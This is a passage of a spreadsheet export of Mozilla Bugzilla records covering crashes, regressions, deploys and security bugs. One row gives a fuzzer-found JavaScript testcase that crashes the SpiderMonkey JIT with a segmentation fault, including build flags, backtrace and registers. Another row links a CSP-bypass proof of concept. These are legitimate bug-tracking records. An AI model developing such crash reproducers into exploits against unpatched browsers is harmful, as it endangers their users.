        </is>
      </c>
      <c r="P5005" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q5005" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5005" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5005" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T5005" t="n">
        <v>1</v>
      </c>
      <c r="U5005" t="n">
        <v>0</v>
      </c>
      <c r="V5005" t="n">
        <v>7</v>
      </c>
      <c r="W5005" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 053b0bb00fed (build with --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --without-intl-api --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --ion-warmup-threshold=0 --baseline-eager):
    var g53 = newGlobal({ newCompartment: true });
    g53.parent = this;
    g53.eval("new Debugger(parent).onExceptionUnwind = function () {};");
    function* wrapNoThrow() {
      for (const i16 of iter) yield i16;
    }
    for (var i16 of [1, 2, 3]) {
      for (var j39 of [4, 5, 6]) {
        for (const i16 of wrapNoThrow()) break;
      }
    }
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x00005555566c4a31 in js::jit::MachineState::read (this=&lt;optimized out&gt;, reg=...) at js/src/jit/Registers.h:261
    #1  js::jit::SnapshotIterator::fromRegister (this=&lt;optimized out&gt;, reg=...) at js/src/jit/JSJitFrameIter.h:426
    #2  js::jit::SnapshotIterator::allocationValue (this=0x7fffffffb0b0, alloc=..., rm=js::jit::SnapshotIterator::RM_Normal) at js/src/jit/JitFrames.cpp:1638
    #3  0x00005555569d570b in js::jit::SnapshotIterator::read (this=&lt;optimized out&gt;) at js/src/jit/JSJitFrameIter.h:536
    #4  InitFromBailout (cx=0x7ffff5f24000, frameNo=140737319684728, fun=..., script=..., iter=..., invalidate=true, builder=..., startFrameFormals=..., nextCallee=..., excInfo=0x7fffffffb9f0) at js/src/jit/BaselineBailouts.cpp:1034
    #5  0x00005555569d23c0 in js::jit::BailoutIonToBaseline (cx=0x6, activation=&lt;optimized out&gt;, iter=..., invalidate=true, bailoutInfo=0x7fffffffb1a0, excInfo=0x7fffffffb9f0) at js/src/jit/BaselineBailouts.cpp:1632
    #6  0x00005555569d37cc in js::jit::ExceptionHandlerBailout (cx=0x7ffff5f24000, frame=..., rfe=0x7fffffffbae8, excInfo=...) at js/src/jit/Bailouts.cpp:223
    #7  0x00005555566c021a in js::jit::HandleExceptionIon (cx=&lt;optimized out&gt;, rfe=&lt;optimized out&gt;, frame=..., hitBailoutException=&lt;optimized out&gt;) at js/src/jit/JitFrames.cpp:187
    #8  js::jit::HandleException (rfe=&lt;optimized out&gt;) at js/src/jit/JitFrames.cpp:647
    #9  0x00000389f04dd336 in ?? ()
    [...]
    #23 0x0000000000000000 in ?? ()
    rax	0x101	257
    rbx	0x1	1
    rcx	0x7fffffffb228	140737488335400
    rdx	0x1	1
    rsi	0x7fffffffae50	140737488334416
    rdi	0x6	6
    rbp	0x7fffffffad10	140737488334096
    rsp	0x7ffffffface0	140737488334048
    r8	0x7ffff5fb2e8c	140737320267404
    r9	0xfffe0d91bd100bb8	-548030360056904
    r10	0x7ffff4cd0400	140737300464640
    r11	0x20	32
    r12	0xfff9800000000000	-1829587348619264
    r13	0x7fffffffb0b0	140737488335024
    r14	0x7fffffffb0b0	140737488335024
    r15	0x7fffffffae50	140737488334416
    rip	0x5555566c4a31 &lt;js::jit::SnapshotIterator::allocationValue(js::jit::RValueAllocation const&amp;, js::jit::SnapshotIterator::ReadMethod)+433&gt;
    =&gt; 0x5555566c4a31 &lt;js::jit::SnapshotIterator::allocationValue(js::jit::RValueAllocation const&amp;, js::jit::SnapshotIterator::ReadMethod)+433&gt;:	mov    (%rax),%r12
       0x5555566c4a34 &lt;js::jit::SnapshotIterator::allocationValue(js::jit::RValueAllocation const&amp;, js::jit::SnapshotIterator::ReadMethod)+436&gt;:	mov    %fs:0x28,%rax</t>
        </is>
      </c>
      <c r="X5005" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5006">
      <c r="A5006" t="n">
        <v>394534</v>
      </c>
      <c r="B5006" t="inlineStr">
        <is>
          <t>2007-08-31 19:47:08 -0700</t>
        </is>
      </c>
      <c r="C5006" t="inlineStr">
        <is>
          <t>[FIX]First attribute doesn't win in misplaced content</t>
        </is>
      </c>
      <c r="D5006" t="inlineStr">
        <is>
          <t>2007-10-04 16:31:55 -0700</t>
        </is>
      </c>
      <c r="E5006" t="n">
        <v>1</v>
      </c>
      <c r="F5006" t="n">
        <v>1</v>
      </c>
      <c r="G5006" t="n">
        <v>3</v>
      </c>
      <c r="H5006" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5006" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5006" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K5006" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5006" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5006" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5006" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5006" t="inlineStr">
        <is>
          <t>baking on trunk (9/10)</t>
        </is>
      </c>
      <c r="Q5006" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5006" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5006" t="inlineStr">
        <is>
          <t>mozilla1.9alpha8</t>
        </is>
      </c>
      <c r="T5006" t="n">
        <v>1</v>
      </c>
      <c r="U5006" t="n">
        <v>0</v>
      </c>
      <c r="V5006" t="n">
        <v>20</v>
      </c>
      <c r="W5006" t="inlineStr">
        <is>
          <t>Problem is also mentioned at http://sla.ckers.org/forum/read.php?2,15336 and http://ha.ckers.org/blog/20070830/overwriting-attributes/
Fix is coming up.  Writing tests now.</t>
        </is>
      </c>
      <c r="X5006" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5007">
      <c r="A5007" t="n">
        <v>1282419</v>
      </c>
      <c r="B5007" t="inlineStr">
        <is>
          <t>2016-06-27 06:13:13 -0700</t>
        </is>
      </c>
      <c r="C5007" t="inlineStr">
        <is>
          <t>Large libnotify alert images trigger a SIGTERM</t>
        </is>
      </c>
      <c r="D5007" t="inlineStr">
        <is>
          <t>2023-07-06 06:57:13 -0700</t>
        </is>
      </c>
      <c r="E5007" t="n">
        <v>1</v>
      </c>
      <c r="F5007" t="n">
        <v>1</v>
      </c>
      <c r="G5007" t="n">
        <v>6</v>
      </c>
      <c r="H5007" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5007" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J5007" t="inlineStr">
        <is>
          <t>Notifications and Alerts</t>
        </is>
      </c>
      <c r="K5007" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5007" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5007" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5007" t="inlineStr"/>
      <c r="Q5007" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5007" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5007" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T5007" t="n">
        <v>1</v>
      </c>
      <c r="U5007" t="n">
        <v>2</v>
      </c>
      <c r="V5007" t="n">
        <v>10</v>
      </c>
      <c r="W5007" t="inlineStr">
        <is>
          <t>STR:
1. Open https://tests.peter.sh/notification-generator/.
2. Select "Huge icon (PNG, 3333x5230)" from the "Icon" drop-down menu.
3. Click "Display the notification."
The GDB backtrace shows a call to `notify_notification_show`, so we at least make it that far.</t>
        </is>
      </c>
      <c r="X5007" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5008">
      <c r="A5008" t="n">
        <v>1451397</v>
      </c>
      <c r="B5008" t="inlineStr">
        <is>
          <t>2018-04-04 09:39:02 -0700</t>
        </is>
      </c>
      <c r="C5008" t="inlineStr">
        <is>
          <t>Clean out Webeng account</t>
        </is>
      </c>
      <c r="D5008" t="inlineStr">
        <is>
          <t>2018-09-13 14:17:50 -0700</t>
        </is>
      </c>
      <c r="E5008" t="n">
        <v>1</v>
      </c>
      <c r="F5008" t="n">
        <v>1</v>
      </c>
      <c r="G5008" t="n">
        <v>4</v>
      </c>
      <c r="H5008" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5008" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5008" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K5008" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5008" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5008" t="inlineStr"/>
      <c r="Q5008" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5008" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5008" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5008" t="n">
        <v>1</v>
      </c>
      <c r="U5008" t="n">
        <v>0</v>
      </c>
      <c r="V5008" t="n">
        <v>8</v>
      </c>
      <c r="W5008" t="inlineStr">
        <is>
          <t>Willkg, we need to keep all RDS databases running for "some data I'm not going to mention that's a royal pain in the ass and I can't wait until it goes away forever", right?
Is there anything else we need to keep?</t>
        </is>
      </c>
      <c r="X5008" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5009">
      <c r="A5009" t="n">
        <v>722831</v>
      </c>
      <c r="B5009" t="inlineStr">
        <is>
          <t>2012-01-31 13:04:38 -0800</t>
        </is>
      </c>
      <c r="C5009" t="inlineStr">
        <is>
          <t>some grayscale png images display improperly when "gfx.color_management.enablev4" enabled</t>
        </is>
      </c>
      <c r="D5009" t="inlineStr">
        <is>
          <t>2014-11-19 19:37:29 -0800</t>
        </is>
      </c>
      <c r="E5009" t="n">
        <v>1</v>
      </c>
      <c r="F5009" t="n">
        <v>1</v>
      </c>
      <c r="G5009" t="n">
        <v>3</v>
      </c>
      <c r="H5009" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5009" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5009" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5009" t="inlineStr">
        <is>
          <t>11 Branch</t>
        </is>
      </c>
      <c r="L5009" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5009" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5009" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5009" t="inlineStr">
        <is>
          <t>[adv-main20+]</t>
        </is>
      </c>
      <c r="Q5009" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5009" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5009" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T5009" t="n">
        <v>1</v>
      </c>
      <c r="U5009" t="n">
        <v>0</v>
      </c>
      <c r="V5009" t="n">
        <v>49</v>
      </c>
      <c r="W5009" t="inlineStr">
        <is>
          <t>Created attachment 593201
left how it looks, right how it should be
User Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:11.0a2) Gecko/20120131 Firefox/11.0a2
Build ID: 20120131042011
Steps to reproduce:
I enabled the "gfx.color_management.enablev4" value in "about:config" to use my LUT display profile. 
Actual results:
Grayscale png-images from xkcd (eg: http://xkcd.com/386/) display improperly.
Expected results:
The images should display without errors.</t>
        </is>
      </c>
      <c r="X5009" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5010">
      <c r="A5010" t="n">
        <v>421571</v>
      </c>
      <c r="B5010" t="inlineStr">
        <is>
          <t>2008-03-07 12:45:01 -0800</t>
        </is>
      </c>
      <c r="C5010" t="inlineStr">
        <is>
          <t>Gmail chat and navigation is broken</t>
        </is>
      </c>
      <c r="D5010" t="inlineStr">
        <is>
          <t>2008-03-10 13:30:36 -0700</t>
        </is>
      </c>
      <c r="E5010" t="n">
        <v>1</v>
      </c>
      <c r="F5010" t="n">
        <v>1</v>
      </c>
      <c r="G5010" t="n">
        <v>3</v>
      </c>
      <c r="H5010" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5010" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5010" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5010" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5010" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5010" t="inlineStr"/>
      <c r="Q5010" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5010" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5010" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5010" t="n">
        <v>1</v>
      </c>
      <c r="U5010" t="n">
        <v>2</v>
      </c>
      <c r="V5010" t="n">
        <v>35</v>
      </c>
      <c r="W5010" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030613 Minefield/3.0b5pre ID:2008030613
repro:
open Gmail
click on [Chat] , [Labels] or [Invite a friend] (left column)
result:
those menus won't expand
now click on [Send mail]
result:
nothing happens, you can't access anything but your inbox
regressionwindow:
works in 20080306_1109_firefox-3.0b5pre.en-US.win32
fails in 20080306_1241_firefox-3.0b5pre.en-US.win32
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=HEAD&amp;branchtype=match&amp;filetype=match&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=1204830540&amp;maxdate=1204836059&amp;cvsroot=%2Fcvsroot</t>
        </is>
      </c>
      <c r="X5010" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5011">
      <c r="A5011" t="n">
        <v>1496461</v>
      </c>
      <c r="B5011" t="inlineStr">
        <is>
          <t>2018-10-04 08:46:55 -0700</t>
        </is>
      </c>
      <c r="C5011" t="inlineStr">
        <is>
          <t>socorro deploy: 339</t>
        </is>
      </c>
      <c r="D5011" t="inlineStr">
        <is>
          <t>2018-10-04 11:12:21 -0700</t>
        </is>
      </c>
      <c r="E5011" t="n">
        <v>1</v>
      </c>
      <c r="F5011" t="n">
        <v>1</v>
      </c>
      <c r="G5011" t="n">
        <v>4</v>
      </c>
      <c r="H5011" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5011" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5011" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K5011" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5011" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5011" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5011" t="inlineStr"/>
      <c r="Q5011" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5011" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5011" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5011" t="n">
        <v>1</v>
      </c>
      <c r="U5011" t="n">
        <v>0</v>
      </c>
      <c r="V5011" t="n">
        <v>4</v>
      </c>
      <c r="W5011" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 339.
It consists of the following:
(current tag: 338 - 29c0125)
226eb26: bug 1463121: fix data migration script to work in prod (willkg)
94360f3: leverage globbing for a more concise run_tests_python3 file (lonnen)
f392186: replace last use of Queue lib with six.moves.queue (lonnen)
e4ceeac: remove unused optionfile library (lonnen)
46f88d4: inline the ALWAYS TRUE and inconsistently used do_quit_check variable (lonnen)
cc55464: remove is_infinite flag and logging message (lonnen)
6b712a0: Switch transaction executor to use reraise (lonnen)
57e9654: replace all use of imap with six.moves.map (lonnen)
2a1838e: replace .keys() with a six compat method in es index cleaner (lonnen)
136462c: replace .keys() with a six compat method in es integration test (lonnen)
bfc0b25: replace iteritems with a six compat method in rmq connection pool (lonnen)
59e2bb7: linter fixups (lonnen)
4ba4b86: remove unused import (lonnen)
1436338: disable unfixed python3 tests, no impact on python 2 (lonnen)
f5f3d8d: Fixed cache tests, tweaked some code, sorted test files (willkg)
ea68b62: bug 1463121: Add row counts for non-pg tables to debug view (willkg)
9caaef5: bug 1463121: fix debug view db table counts to work in stage (willkg)
(next tag: 339 - 300824d)</t>
        </is>
      </c>
      <c r="X5011" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5012">
      <c r="A5012" t="n">
        <v>1226651</v>
      </c>
      <c r="B5012" t="inlineStr">
        <is>
          <t>2015-11-20 09:42:45 -0800</t>
        </is>
      </c>
      <c r="C5012" t="inlineStr">
        <is>
          <t>Several reference data tables are missing composite unique keys after bug 1193836</t>
        </is>
      </c>
      <c r="D5012" t="inlineStr">
        <is>
          <t>2015-11-25 06:16:34 -0800</t>
        </is>
      </c>
      <c r="E5012" t="n">
        <v>1</v>
      </c>
      <c r="F5012" t="n">
        <v>1</v>
      </c>
      <c r="G5012" t="n">
        <v>7</v>
      </c>
      <c r="H5012" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5012" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5012" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5012" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5012" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5012" t="inlineStr"/>
      <c r="Q5012" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5012" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5012" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5012" t="n">
        <v>1</v>
      </c>
      <c r="U5012" t="n">
        <v>0</v>
      </c>
      <c r="V5012" t="n">
        <v>11</v>
      </c>
      <c r="W5012" t="inlineStr">
        <is>
          <t>The template SQL files for the reference data tables were removed, since we're now using the Django model to create the tables instead:
https://github.com/mozilla/treeherder/commit/0f3788036290146d99df76dea73edbebaa2b1aab
However in the template files the following had composite unique keys, which aren't in the model:
* reference_data_signatures
* job_group
* user_exclusion_profile
Also the exclusion_profile_exclusions table doesn't exist in the model at all, when it was in the template SQL. Is this expected?</t>
        </is>
      </c>
      <c r="X5012" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5013">
      <c r="A5013" t="n">
        <v>479311</v>
      </c>
      <c r="B5013" t="inlineStr">
        <is>
          <t>2009-02-19 14:11:50 -0800</t>
        </is>
      </c>
      <c r="C5013" t="inlineStr">
        <is>
          <t>Modal dialogs stops execution of MozMill tests</t>
        </is>
      </c>
      <c r="D5013" t="inlineStr">
        <is>
          <t>2016-08-24 09:02:38 -0700</t>
        </is>
      </c>
      <c r="E5013" t="n">
        <v>1</v>
      </c>
      <c r="F5013" t="n">
        <v>1</v>
      </c>
      <c r="G5013" t="n">
        <v>6</v>
      </c>
      <c r="H5013" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5013" t="inlineStr">
        <is>
          <t>Testing Graveyard</t>
        </is>
      </c>
      <c r="J5013" t="inlineStr">
        <is>
          <t>Mozmill</t>
        </is>
      </c>
      <c r="K5013" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5013" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5013" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5013" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5013" t="inlineStr">
        <is>
          <t>[mozmill-1.2]</t>
        </is>
      </c>
      <c r="Q5013" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5013" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5013" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5013" t="n">
        <v>1</v>
      </c>
      <c r="U5013" t="n">
        <v>0</v>
      </c>
      <c r="V5013" t="n">
        <v>20</v>
      </c>
      <c r="W5013" t="inlineStr">
        <is>
          <t>Created attachment 363189
MozMill test
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090219 Shiretoko/3.1b3pre ID:20090219020454 and MozMill 1.0.2
The execution of tests in MozMill, which call a modal dialog (sheet), will stop  when the dialog is opened. That makes it impossible to run any action in those dialogs. After the dialog gets closed manually the execution continuous.
See the attached MozMill test.</t>
        </is>
      </c>
      <c r="X5013" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5014">
      <c r="A5014" t="n">
        <v>1365605</v>
      </c>
      <c r="B5014" t="inlineStr">
        <is>
          <t>2017-05-17 07:09:08 -0700</t>
        </is>
      </c>
      <c r="C5014" t="inlineStr">
        <is>
          <t>1.36ms uninterruptible reflow at _loadURL@chrome://browser/content/urlbarBindings.xml:593:11</t>
        </is>
      </c>
      <c r="D5014" t="inlineStr">
        <is>
          <t>2022-03-02 08:08:23 -0800</t>
        </is>
      </c>
      <c r="E5014" t="n">
        <v>1</v>
      </c>
      <c r="F5014" t="n">
        <v>1</v>
      </c>
      <c r="G5014" t="n">
        <v>2</v>
      </c>
      <c r="H5014" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5014" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5014" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5014" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5014" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5014" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5014" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5014" t="inlineStr">
        <is>
          <t>[ohnoreflow][reserve-photon-performance]</t>
        </is>
      </c>
      <c r="Q5014" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5014" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5014" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5014" t="n">
        <v>1</v>
      </c>
      <c r="U5014" t="n">
        <v>0</v>
      </c>
      <c r="V5014" t="n">
        <v>4</v>
      </c>
      <c r="W5014" t="inlineStr">
        <is>
          <t>Here's the stack:
_loadURL@chrome://browser/content/urlbarBindings.xml:593:11
handleCommand@chrome://browser/content/urlbarBindings.xml:533:11
handleOneOffSearch@chrome://browser/content/urlbarBindings.xml:1777:11
handleSearchCommand@chrome://browser/content/search/search.xml:1891:11
onxblclick@chrome://browser/content/search/search.xml:2332:9
That's this focus() call here: http://searchfox.org/mozilla-central/rev/ae24a3c83d22e0e35aecfd9049c2b463ca7e045b/browser/base/content/urlbarBindings.xml#600</t>
        </is>
      </c>
      <c r="X5014" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5015">
      <c r="A5015" t="n">
        <v>1416045</v>
      </c>
      <c r="B5015" t="inlineStr">
        <is>
          <t>2017-11-09 15:36:34 -0800</t>
        </is>
      </c>
      <c r="C5015" t="inlineStr">
        <is>
          <t>CSP is not applied to documents sent through multipart/x-mixed-replace</t>
        </is>
      </c>
      <c r="D5015" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:12 -0700</t>
        </is>
      </c>
      <c r="E5015" t="n">
        <v>1</v>
      </c>
      <c r="F5015" t="n">
        <v>1</v>
      </c>
      <c r="G5015" t="n">
        <v>3</v>
      </c>
      <c r="H5015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5015" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5015" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5015" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5015" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5015" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5015" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5015" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main60+]</t>
        </is>
      </c>
      <c r="Q5015" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5015" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5015" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5015" t="n">
        <v>1</v>
      </c>
      <c r="U5015" t="n">
        <v>0</v>
      </c>
      <c r="V5015" t="n">
        <v>40</v>
      </c>
      <c r="W5015" t="inlineStr">
        <is>
          <t>From bug 1223743.
PoC: http://mallory.csrf.jp/x-mixed-replace/csp/bad.php</t>
        </is>
      </c>
      <c r="X5015" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5016">
      <c r="A5016" t="n">
        <v>621108</v>
      </c>
      <c r="B5016" t="inlineStr">
        <is>
          <t>2010-12-22 23:33:15 -0800</t>
        </is>
      </c>
      <c r="C5016" t="inlineStr">
        <is>
          <t>[SECURITY] Creating/editing charts lacks CSRF protection</t>
        </is>
      </c>
      <c r="D5016" t="inlineStr">
        <is>
          <t>2013-01-28 10:08:01 -0800</t>
        </is>
      </c>
      <c r="E5016" t="n">
        <v>1</v>
      </c>
      <c r="F5016" t="n">
        <v>1</v>
      </c>
      <c r="G5016" t="n">
        <v>4</v>
      </c>
      <c r="H5016" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5016" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5016" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K5016" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L5016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5016" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5016" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:moderate]</t>
        </is>
      </c>
      <c r="Q5016" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5016" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5016" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T5016" t="n">
        <v>1</v>
      </c>
      <c r="U5016" t="n">
        <v>0</v>
      </c>
      <c r="V5016" t="n">
        <v>12</v>
      </c>
      <c r="W5016" t="inlineStr">
        <is>
